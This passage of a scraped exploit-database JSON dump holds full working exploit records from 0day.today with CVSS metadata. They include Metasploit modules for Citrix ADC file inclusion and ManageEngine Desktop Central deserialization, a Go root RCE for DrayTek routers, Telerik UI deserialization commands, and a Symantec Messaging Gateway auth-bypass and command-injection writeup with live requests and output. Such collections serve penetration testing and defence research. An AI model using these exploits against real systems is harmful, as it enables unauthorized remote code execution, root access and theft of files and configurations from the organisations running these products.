"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-11-14T00:00:00", "type": "zdt", "title": "Citrix ADC NetScaler Local File Inclusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": 
"2020-11-14T00:00:00", "id": "1337DAY-ID-35228", "href": "https://0day.today/exploit/description/35228", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)',\n 'Description' => %{\n The remote device is affected by multiple vulnerabilities.\n\n An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices.\n An unauthenticated remote attacker with access to the `NSIP/management interface` can exploit\n this to bypass authorization (CVE-2020-8193).\n\n And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which.\n },\n 'Author' => [\n 'Donny Maasland', # Discovery\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2020-8193'],\n ['CVE', '2020-8195'],\n ['CVE', '2020-8196'],\n ['URL', 'https://dmaasland.github.io/posts/citrix.html'],\n ['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'],\n ['URL', 'https://github.com/jas502n/CVE-2020-8193']\n ],\n 'DisclosureDate' => '2020-07-09',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n }\n ))\n\n register_options([\n OptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]),\n OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def create_session\n params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1'\n\n request = {\n 'method' => 'POST',\n 'uri' => 
\"#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}\",\n 'ctype' => 'application/xml',\n 'headers' => {\n 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),\n 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8)\n },\n 'data' => '<appfwprofile><login></login></appfwprofile>'\n }\n request = request.merge({'cookie' => @cookie}) if @cookie\n\n response = send_request_raw(request)\n unless response && response.code == 406\n print_error(\"#{@message_prefix} - No response to session request.\")\n return\n end\n\n response.get_cookies\n end\n\n def fix_session_rand\n response = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'menu', 'ss'),\n 'cookie' => @cookie,\n 'vars_get' => {\n 'sid' => 'nsroot',\n 'username' => 'nsroot',\n 'force_setup' => '1'\n }\n )\n\n if response && response.code == 302\n location = response.headers['location']\n\n response = send_request_cgi(\n 'method' => 'GET',\n 'uri' => location,\n 'cookie' => @cookie\n )\n\n return unless response && response.code == 200\n end\n\n response.to_s.scan(/rand = \"([^\"]+)\"/).join\n end\n\n def read_lfi(path, var_rand)\n params = \"filter=path:#{path}\"\n\n request = {\n 'method' => 'POST',\n 'uri' => \"#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}\",\n 'cookie' => @cookie,\n 'ctype' => 'application/xml',\n 'headers' => {\n 'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),\n 'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8),\n 'rand_key' => var_rand\n },\n 'data' => '<clipermission></clipermission>'\n }\n\n response = send_request_raw(request)\n end\n\n def run_host(ip)\n proto = (datastore['SSL'] ? 
'https' : 'http')\n @message_prefix = \"#{proto}://#{ip}:#{datastore['RPORT']}\"\n\n @cookie = create_session\n if @cookie && @cookie =~ /SESSID/\n print_status(\"#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}\")\n\n var_rand = fix_session_rand\n unless var_rand\n print_error(\"#{@message_prefix} - Unable to get rand value.\")\n return Exploit::CheckCode::Unknown\n end\n print_status(\"#{@message_prefix} - Got rand: #{var_rand}\")\n\n print_status(\"#{@message_prefix} - Re-breaking session...\")\n create_session\n\n case datastore['MODE']\n when /discovery/\n response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand)\n if response.code == 406\n if response.body.include? ('root:*:0:0:')\n print_warning(\"#{@message_prefix} - Vulnerable.\")\n\n return Exploit::CheckCode::Vulnerable\n end\n end\n when /interactive/\n # TODO: parse response\n response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand)\n if response.code == 406\n print_line(\"#{response.body}\")\n end\n\n return\n when /sessions/\n # TODO: parse response\n response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand)\n if response.code == 406\n print_line(\"#{response.body}\")\n end\n\n return\n end\n end\n print_good(\"#{@message_prefix} - Not Vulnerable.\")\n\n return Exploit::CheckCode::Safe\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35228", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-19T01:04:29", "description": "Exploit for asp platform in category web applications", "cvss3": {}, "published": "2019-12-18T00:00:00", "type": "zdt", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "1337DAY-ID-33683", "href": "https://0day.today/exploit/description/33683", "sourceData": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit\r\n\r\nSee the full write-up at 
Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, 
Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip\n\n# 0day.today [2019-12-18] #", "sourceHref": "https://0day.today/exploit/33683", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-06T16:43:38", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-30T00:00:00", "type": "zdt", "title": "DrayTek Products - Pre-authentication Remote Root Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-03-30T00:00:00", "id": "1337DAY-ID-34170", "href": "https://0day.today/exploit/description/34170", "sourceData": "package main\n\n\n/*\nCVE-2020-8515: DrayTek pre-auth remote root RCE\nMon Mar 30 2020 - 0xsha.io\nAffected:\nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,\nand Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,\nand 1.4.4_Beta\nYou should upgrade as soon as possible to 1.5.1 firmware or later\nThis issue has been fixed in Vigor3900/2960/300B v1.5.1.\nread more :\nhttps://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html\nhttps://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/\nhttps://thehackernews.com/2020/03/draytek-network-hacking.html\nhttps://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/\nexploiting using keyPath\nPOST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: 1.2.3.4\nContent-Length: 89\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n */\n\nimport (\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"net/http\"\n\t\"net/url\"\n\t\"os\"\n\t\"strings\"\n)\n\nfunc usage() {\n\n\tfmt.Println(\"CVE-2020-8515 exploit by @0xsha \")\n\tfmt.Println(\"Usage : \" + os.Args[0] + \" URL \" + \"command\" )\n\tfmt.Println(\"E.G : \" + os.Args[0] + \" http://1.2.3.4 \" + \"\\\"uname -a\\\"\" )\n}\n\nfunc main() {\n\n\n\tif len(os.Args) < 3 {\n\t\tusage()\n\t\tos.Exit(-1)\n\t}\n\n\ttargetUrl := os.Args[1]\n\t//cmd := \"cat /etc/passwd\"\n\tcmd := os.Args[2]\n\n\n\t// payload preparation\n\tvulnerableFile := \"/cgi-bin/mainfunction.cgi\"\n\t// specially crafted 
CMD\n\t// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n\tpayload :=`'\n\t/bin/sh -c 'CMD'\n\t'`\n\tpayload = strings.ReplaceAll(payload,\"CMD\", cmd)\n\tbypass := strings.ReplaceAll(payload,\" \", \"${IFS}\")\n\n\t//PostForm call url encoder internally\n\tresp, err := http.PostForm(targetUrl+vulnerableFile ,\n\t\turl.Values{\"action\": {\"login\"}, \"keyPath\": {bypass} , \"loginUser\": {\"a\"}, \"loginPwd\": {\"a\"} })\n\n\tif err != nil{\n\t\tfmt.Println(\"error connecting host\")\n\t\tos.Exit(-1)\n\t}\n\n\n\tdefer resp.Body.Close()\n\tbody, err := ioutil.ReadAll(resp.Body)\n\t\n\tif err != nil{\n\t\tfmt.Println(\"error reading data\")\n\t\tos.Exit(-1)\n\t}\n\t\n\tfmt.Println(string(body))\n\n}\n", "sourceHref": "https://0day.today/exploit/34170", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T18:30:05", "description": "This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. 
Tested against 10.0.465 x64.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "ManageEngine Desktop Central Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34095", "href": "https://0day.today/exploit/description/34095", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 
10.0.474. Tested against 10.0.465 x64.\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of that,\n the complete fix for the remote code execution vulnerability is now\n available in build 10.0.479.\"\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10189'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\n ],\n 'DisclosureDate' => '2020-03-05', # 0day release\n 'License' => MSF_LICENSE,\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n ],\n ['Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper\n ],\n ['PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'RPORT' => 8383,\n 'SSL' => true,\n 'WfsDelay' => 60 # It can take a little while to trigger\n },\n 'CmdStagerFlavor' => 'certutil', # This works without issue\n 'Notes' => {\n 'PatchedVersion' => Gem::Version.new('100474'),\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\n )\n\n unless res\n return CheckCode::Unknown('Target is not responding to check')\n end\n\n unless res.code == 200 && res.body.include?('ManageEngine 
Desktop Central')\n return CheckCode::Unknown('Target is not running Desktop Central')\n end\n\n version = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\n\n unless version\n return CheckCode::Detected('Could not detect Desktop Central version')\n end\n\n vprint_status(\"Detected Desktop Central version #{version}\")\n\n if Gem::Version.new(version) < notes['PatchedVersion']\n return CheckCode::Appears(\"#{version} is an exploitable version\")\n end\n\n CheckCode::Safe(\"#{version} is not an exploitable version\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: An executable is required to run arbitrary commands\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\n\n vprint_status(\"Serializing command: #{cmd}\")\n\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\n 'CommonsBeanutils1',\n cmd\n )\n\n # XXX: Patch in expected serialVersionUID\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\n\n # Rock 'n' roll!\n upload_serialized_payload(serialized_payload)\n deserialize_payload\n end\n\n def upload_serialized_payload(serialized_payload)\n print_status('Uploading serialized payload')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/mdm/client/v1/mdmLogUploader'),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\n 'filename' => 'logger.zip'\n },\n 'data' => 
serialized_payload\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\n end\n\n print_good('Successfully uploaded serialized payload')\n\n # C:\\Program Files\\DesktopCentral_Server\\bin\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\n end\n\n def deserialize_payload\n print_status('Deserializing payload')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'cewolf/'),\n 'vars_get' => {'img' => '\\\\logger.zip'}\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\n end\n\n print_good('Successfully deserialized payload')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34095", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-04T21:32:34", "description": "Exploit for jsp platform in category web applications", "cvss3": {}, "published": "2017-08-19T00:00:00", "type": "zdt", "title": "Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-6327"], "modified": "2017-08-19T00:00:00", "id": "1337DAY-ID-28326", "href": "https://0day.today/exploit/description/28326", "sourceData": "This is an advisory for CVE-2017-6327 which is an unauthenticated remote\r\ncode execution flaw in the web interface of Symantec Messaging Gateway\r\nprior to and including version 10.6.3-2, which can be used to execute\r\ncommands as root.\r\n \r\nSymantec Messaging Gateway, formerly known as Brightmail, is a linux-based\r\nanti-spam/security product for e-mail servers. 
It is deployed as a physical\r\ndevice or with ESX in close proximity to the servers it is designed to\r\nprotect.\r\n \r\n=*=*=*=*=*=*=*=*= TIMELINE\r\n \r\n2017-07-07: Reported to Symantec\r\n2017-08-10: Patch and notice released by Symantec [1]\r\n2017-08-18: Public technical advisory\r\n \r\n=*=*=*=*=*=*=*=*= DESCRIPTION\r\n \r\n- Bug #1: Web authentication bypass\r\n \r\nThe web management interface is available via HTTPS, and you can't do much\r\nwithout logging in.\r\n \r\nIf the current session (identified by the `JSESSIONID` cookie) has the\r\n`user` attribute set, the session is considered authenticated.\r\n \r\nThe file LoginAction.class defines a number of public methods and they can\r\nall be reached via unauthenticated web requests.\r\n \r\nBy making a GET request to `/brightmail/action1.do?method=method_name` we\r\ncan execute `LoginAction.method_name` if `method_name` is a public method.\r\n \r\nOne such public method which will be the target of our authentication\r\nbypass is called `LoginAction.notificationLogin`.\r\n \r\nIt does the following:\r\n \r\n1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt`\r\n2. Creates a new `UserTO` object using the decrypted `notify` parameter as\r\nan email value\r\n3. Creates a new session, invalidating the old one if necessary\r\n4. Sets the `user` attribute of the newly created session to our\r\nconstructed UserTO object\r\n \r\nIt essentially takes a username value from a GET parameter and logs you in\r\nas this user if it exists. If not, it creates this user for you.\r\n \r\nWe need to encrypt our `notify` argument so that\r\n`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the\r\nencryption is just PBEWithMD5AndDES using a static password, conveniently\r\nincluded in the code itself. 
I won't include the encryption password or a\r\nfully encrypted notify string in this post.\r\n \r\n \r\nExample request:\r\n \r\nGET\r\n/brightmail/action1.do?method=notificationLogin&notify=MTIzNDU2Nzg%3d6[...]&id=test\r\nHTTP/1.1\r\n...\r\n \r\n \r\nHTTP/1.1 302 Found\r\nServer: Apache-Coyote/1.1\r\n...\r\nSet-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail;\r\nSecure; HttpOnly\r\n \r\n \r\n- Bug #2: Command injection\r\n \r\nThe RestoreAction.performRestore method can be reached with an\r\nauthenticated session and it takes the restoreSource and\r\nlocalBackupFilename parameters.\r\n \r\nAfter a long chain of function calls, localBackupFilename ends up being\r\nsent to the local \"bmagent\" daemon listening on port 41002. It will execute\r\n/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied\r\nvalue.\r\n \r\nThe db-restore script is a sudo wrapper for\r\n/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl\r\nscript containing a command injection in a call to /usr/bin/du.\r\n \r\n$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;\"`id`\";'\r\n/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory\r\nsh: uid=0(root) gid=0(root) groups=0(root): command not found\r\nERROR: Failed to copy 'asdf;\"`id`\";' from local backup store: No such file\r\nor directory\r\n \r\n \r\nThis command injection can be exploited from the web management interface\r\nwith a valid session, which we can create using bug #1.\r\n \r\n- Combining bug #1 and #2\r\n \r\nThe last step is to get a CSRF token since the vulnerable performRestore\r\nfunction is annotated with @CSRF.\r\n \r\nAfter some quick digging it turns out that all you need to do is call\r\n/brightmail/common.jsp to get a token that will be valid for all your\r\nrequests.\r\n \r\nThe URL-encoded value we provide for the `localBackupFileSelection`\r\nparameter 
is:\r\nasdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname\r\n-a>>/data/bcc/webapps/brightmail/output.txt`hehehe\r\n \r\nRequest:\r\n \r\nGET\r\n/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65\r\nHTTP/1.1\r\nHost: 192.168.205.220\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0)\r\nGecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nCookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n \r\nResponse:\r\n \r\nHTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nCache-Control: no-store,no-cache\r\nPragma: no-cache\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nX-Frame-Options: SAMEORIGIN\r\nContent-Type: text/html;charset=UTF-8\r\nContent-Length: 803\r\nDate: Thu, 29 Jun 2017 06:48:12 GMT\r\nConnection: close\r\n \r\n<HTML>\r\n<title>Symantec Messaging Gateway -&nbps;Restore</title>\r\n...\r\n \r\n \r\nNow to confirm that our command output was correctly placed in a file\r\ninside the webroot.\r\n \r\nimac:~% curl -k https://192.168.205.220/brightmail/output.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13\r\n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n \r\n=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT\r\n \r\nimac:~/brightmail% python brightmail-rce.py\r\nhttps://192.168.205.220/brightmail\r\nbypassing login..\r\n* 
JSESSIONID=693079639299816F80016123BE8A0167\r\nverifying login bypass..\r\n* Version: 10.6.3\r\ngetting csrf token..\r\n* 1e35af8c567d3448a65c8516a835cec30b6b8b73\r\ndone, verifying..\r\n \r\nuid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root)\r\ngroups=0(root),99(nobody),499(mysql),502(bcc)\r\nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13\r\n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n \r\n# cat /etc/issue\r\n \r\nSymantec Messaging Gateway\r\nVersion 10.6.3-2\r\nCopyright (c) 1998-2017 Symantec Corporation. All rights reserved.\r\n \r\n \r\n=*=*=*=*=*=*=*=*= REFERENCES\r\n \r\n[1]\r\nhttps://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00\r\n \r\n=*=*=*=*=*=*=*=*= CREDIT\r\n \r\nPhilip Pettersson\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/28326", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-30T02:13:36", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-04-29T00:00:00", "type": "zdt", "title": "Websphere / JBoss / OpenNMS / Symantec - Java Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2018-04-29T00:00:00", "id": "1337DAY-ID-30269", "href": "https://0day.today/exploit/description/30269", "sourceData": "#! 
